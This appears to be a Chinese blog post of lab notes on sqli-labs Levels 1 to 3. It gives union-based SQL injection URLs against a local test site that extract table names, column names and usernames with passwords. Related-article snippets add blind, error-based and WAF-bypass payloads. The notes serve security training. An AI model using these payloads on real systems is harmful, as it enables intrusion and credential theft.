sql靶场笔记

原创 已于 2022-02-09 15:22:58 修改 · 774 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #database

于 2022-02-07 18:00:13 首次发布
本文详细介绍了SQL注入攻击的步骤和技巧,从第一关到第三关,逐步展示了如何利用单引号闭合、联合查询、信息_schema表来探测数据库、表及数据。通过输入特殊字符,观察回显,确定数据列数,最终获取用户名和密码,揭示了SQL注入的常见手法和防范措施。

第一关

1、判断闭合符号
通过提交

?id=1、?id=1 and 1=1、?id=2

发现有回显
在这里插入图片描述
在id后面加入反斜杠发现是单引号闭合
在这里插入图片描述

在url中加入单引号出现报错
在这里插入图片描述
2、即单引号字符型注入,我们可以使用order by X来获取列数(例如:id=1‘order by 1–+这条语句的意思是查询users表中user_id为1的数据并按第一字段排行)
而我们在输入id=1’ order by 4–+的时候报错,那么说明数据有三列。
在这里插入图片描述
3、接下来我们使用 union select 联合查询查看当前的数据库(union 运算符可以将两个或两个以上 select 语句的查询结果集合合并成一个结果集合显示,即执行联合查询)
即:id=-1’ union select 1,2,3–+也可以(id=1’ and 1=0 union select 1,2,3–+)目的就是使union前的查询无返回结果从而返回到执行联合查询的结果
在这里插入图片描述
判断出数据在2,3列
4、对数据库和表进行注入获取数据
先查询当前数据库:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,(select database()),3--+

在这里插入图片描述
然后我们用group_concat()函数查看库中有哪些表:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3--+

information_schema:是数据库,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。
在这里插入图片描述
也可以在第三列里爆出表名:只需把union语句放到3的位置就行
在这里插入图片描述
5、查看users表里面的内容

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")--+

在这里插入图片描述
6、查看用户名和密码

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,(select group_concat(username,password) from users)--+

在这里插入图片描述

第二关

1、查看回显
依旧是输入?id=1、?id=1 and 1=1、?id=2
后面加入反斜杠
在这里插入图片描述
发现可以不用闭合直接查询
那么就跟第一关一样了,只不过不用加单引号。
2、使用order by
发现有三列
3、用union联合查询

?id=-1 union select 1,2,3--+

4、查看数据库

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3--+

5、查看表中内容

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")--+

6、获取用户名和密码

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,(select group_concat(username,password) from users)--+

第三关

1、首先输入反斜杠,发现是单引号括号闭合
在这里插入图片描述
2、order by查询
发现依旧是三列
3、联合查询

http://127.0.0.1/sqli-labs-master/Less-3/?id=1') and 1=2 union select 1,2,3--+

4、注入获取数据库和表的数据

http://127.0.0.1/sqli-labs-master/Less-3//?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3--+

5、查看user表里的内容

http://127.0.0.1/sqli-labs-master/Less-3//?id=-1') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")--+

6、查看用户名和密码

http://127.0.0.1/sqli-labs-master/Less-3//?id=-1') union select 1,2,(select group_concat(username,password) from users)--+
稚少莽...
关注
sql靶场练习笔记2
qq_61109509的博客
02-07 2811
目录 环境:sqli靶场 Less-5 基于'字符型的错误回显注入 less-6 基于"字符型的错误回显注入 总结报错注入之updatexml语句: 总结报错注入之extractvalue语句: 总结报错注入之floor语句: Less-7 文件读写注入 总结文件注入知识 一句话木马 环境:sqli靶场 Less-5 基于'字符型的错误回显注入 输入?id=1,页面正常 输入?id=2',页面出现错误语句 尝试 ?id=1' order by 1,2,3-- -...
墨者学院(4个sql靶场攻略)
2201_75891821的博客
07-22 2023
墨者学院 4种sql注入漏洞的解答 简单易理解 不复杂
SQL 注入漏洞(七)报错注入
不秃头的程序Yang
06-12 1273
一、代码分析 二、报错注入攻击 1、获取库名
sql注入实战—报错注入
qq_40909772的博客
07-16 895
测试网站:自建靶场 http://192.168.57.128:1237/sql/error.php?username=1 测试工具:Burp Suite 1.首先访问http://192.168.57.128:1237/sql/error.php?username=1’,因为参数username的值是1’,在数据库中执行SQL时,会因为多了一个单引号报错,输出结果如下所示:   通过页面返回的结果可以看出,程序直接将错误信息输出到了页面上,所以此处可以利用报错注入来获取数据。 2.报错注入有多种格式,此
SQL注入攻击的简单示例
weixin_30888707的博客
05-22 382
SQL注入攻击的简单示例: statement := "SELECT * FROM Users WHERE Value= " + a_variable + " 上面这条语句是很普通的一条SQL语句,他主要实现的功能就是让用户输入一个员工编号然后查询处这个员工的信息。但是若这条语句被不法攻击者改装过后,就可能成为破坏数据的黑手。如攻击者在输入变量的时候,输...
delphi中SQL避免非法字符,单引号(')出错的三种方法
wozengcong的专栏
08-30 3324
由于 ' (单引号)是SQL的标准字符符号,所以在SQL语句中间遇到 ' 时要做特殊处理。 1. 使用 QuotedStr 函数 QuotedStr的作用是使字符串包含单引号:  在字符的前后加上( ')号,因为在DELPHI中字符赋值是需要引号的 比如  CommandText   :=   CommandText   +   QuotedStr(Edit1.Text);   Sql
精选资源
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
Burp靶场SQL注入学习笔记3
最新发布
Tonight_Fantasy的博客
04-04 889
本关还是需要获得users表内的账户和密码,但是变成了盲注根据提示,这题的注入点在cookie而不是在url上修改cookie的值页面正常再次修改cookie页面也正常回显,但是登录信息没了那么我们就可以根据这个welcome back来判断SQL语句是否为真既然知道了我们的目标列就是users表里的password,那么就直接爆破吧先判断密码长度使用payload在小于20时没有回显welcome back那么密码长度应该就是20爆数据,配合burp里的intruder模块。
SQLi-Labs靶场通关笔记(1~21关)
trdtyvu的博客
07-06 3362
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个关卡,其中关卡的类型有但不限于联合查询注入报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择关卡。
Sql语句中单引号'异常问题
天天开心鸭!
01-21 2541
前言: 部分项目中多多少少会用到SQL语句,但是包含英文的单引号SQL语句在执行时就会报错,需要进行转义处理 问题原因: SQL语句单引号未转义 问题报错: 解决方法: 如果是查询条件,应该尽可能使用参数化查询。 实在是要单引号,那就再加一个单引号来转义。 用两个单引号,表示一个单引号。 比如查询Name为abc'cc的 SELECT *...
SQL注入
x2813488062的博客
02-11 3071
sql注入基本知识 在Mysql5.0后提供information_schema schemata表提供了当前mysql实例中所有数据库的信息 information_schema是MySQL数据库自带的,所有可以直接查询此表,MySQL 5以下版本无此数据库 schema_name代表了所有数据库名 1.通过 ?id=1’ 和 id=1’’ 判断是否存在漏洞 ?id=1’ ?id=1” 如果都报错,则为整形闭合。 如果单引号报错,双引号不报错。 然后尝试 ?id=1’–+ 无报错
SQL 语句中的字符串有单引号导致报错的解决
lovemelovefish的博客
07-26 1137
SQL 语句执行对象中,本内容的字符串内含有单引号导致查询或插入数据库报错,例如 str = 关键字附近有语法错误。
sql输入单引号总显示错误 为什么
AuthFailure的博客
09-20 4401
今天查看APP异常log,发现有个sql语句报了很多错。 具体就是某个商品名称里带了个引号,sql查询时报错。 具体解决如下: 单引号改成两个单引号(如下)即可 select * from a where name = 'a''b'
SQL注入漏洞
haoge1998的博客
04-15 1488
SQL注入漏洞 1、注入攻击的核心点: 拼接有效的语句或代码 确保完成闭合,并且可以改变原有执行逻辑 2、防护: 从代码和sql语句的逻辑层面考虑,不能轻易让密码对比失效 基于用户输入的引号(单引号和双引号)进行转义处理,可以使用PHP内置函数addslashes进行强制转义。 使用mysqli的预处理功能 一、查询注入的数据类型 注入类型可以分为三类: 1、数字型 select * from tables where id = 1; 2、字符型 select * from tables whe
sql语句报错
Br不二
11-15 534
ode: 'ER_PARSE_ERROR', errno: 1064, sqlMessage: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''10' OFFSET 0' at line 1", sqlState: '42000', index: 0, sql: "
SQL插入时,当存在单引号导致的插入失败
走在搬砖的路上!
10-11 654
没有找到直接转的函数,但是可以按一下几种方式处理: 1、replace() Astring.replace("'","”") 把 英式 单引号 改为 中文单引号 2、re 正则处理匹配 略 3、...
SQL注入——union获取数据库信息
m0_71714379的博客
02-05 1505
web安全学习笔记
sql注入--报错
pakho_C的博客
01-01 942
SQL注入报错靶场sqli-labs-master 下载链接:靶场下载连接 第一关源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection
MSSQL注入
秋水的博客
09-04 9397
MSSQL数据库 数据库简介 MSSQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。属关系型数据库 注入简介 MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路 ...
sql-libs靶场过关笔记
04-01
<think>好的,用户需要关于SQL注入实验室的过关技巧或SQL库挑战的笔记。首先,我需要回忆常见的SQL注入类型和防御方法,确保内容准确。然后,考虑如何结构清晰地组织这些信息,分步骤讲解过关技巧,可能包括基础注入、联合查询、布尔盲注和时间盲注等。 要确保使用正确的中文术语,比如“联合查询注入”而不是直译的“union based”。同时,用户提到需要引用站内资料,但目前没有具体的引用来源,可能需要添加通用引用标识,如[^1]或[^2],假设这些引用指向相关教程或文档。 接下来,生成相关问题,这些问题应该涵盖防御方法、工具使用、不同数据库的差异以及绕过WAF的技巧。这部分需要覆盖用户可能进一步感兴趣的方面,帮助他们深入学习。 需要注意避免使用Markdown格式,但按照用户的要求,回答中的代码部分需要用三个反引号包裹,并指定语言。同时,数学公式部分虽然没有直接涉及,但如果有示例中的情况,比如Payload中的计算,可能需要使用行内公式,但这里可能不太需要。 最后,检查内容是否真实可靠,避免错误信息,比如正确区分不同类型的注入方法和对应的Payload结构。确保示例代码正确,比如联合查询时的列数匹配和注释符的使用。此外,提醒用户合法授权的测试,避免法律问题。</think># SQL注入实验室过关技巧与库函数应用指南 ## 一、基础注入技巧 1. 字符型注入检测: ```sql ' OR 1=1 -- ``` 通过闭合单引号构造永真条件,注意结尾空格和注释符的使用[^1] 2. 数字型注入检测: ```sql 1 OR 1=1 ``` 不需要闭合引号,直接拼接逻辑表达式 ## 二、联合查询注入 1. 确定列数(二分法示例): ```sql ' ORDER BY 5-- ``` 逐步增加数字直到报错,确定返回列数 2. 构造有效联合查询: ```sql ' UNION SELECT 1,@@version,3,4 -- ``` 需匹配主查询列数,关键函数: - `database()` 当前数据库 - `user()` 当前用户 - `@@version` 数据库版本 ## 三、盲注技术 1. 布尔盲注模板: ```sql ' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1)='a' -- ``` 通过响应差异判断字符 2. 时间盲注示例: ```sql ' IF(ASCII(SUBSTRING(database(),1,1))>100, SLEEP(3),0) -- ``` 利用时间延迟判断条件真假 ## 四、常用SQL函数库 1. 字符串处理: ```sql CONCAT(), SUBSTRING(), CHAR() ``` 2. 信息获取: ```sql LOAD_FILE(), @@datadir ``` 3. 系统函数: ```sql SLEEP(), BENCHMARK() ``` ## 五、防御绕过技巧 1. 编码绕过: ```python # URL编码示例 payload = "' UNION SELECT 1,2,3-- " encoded = urllib.parse.quote(payload) # 得到%27%20UNION%20SELECT... ``` 2. 双写关键字绕过: ```sql ' UNIUNIONON SELECT 1,2 -- ``` 3. 注释符变体: ```sql /*!50000SELECT*/ VERSION() ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值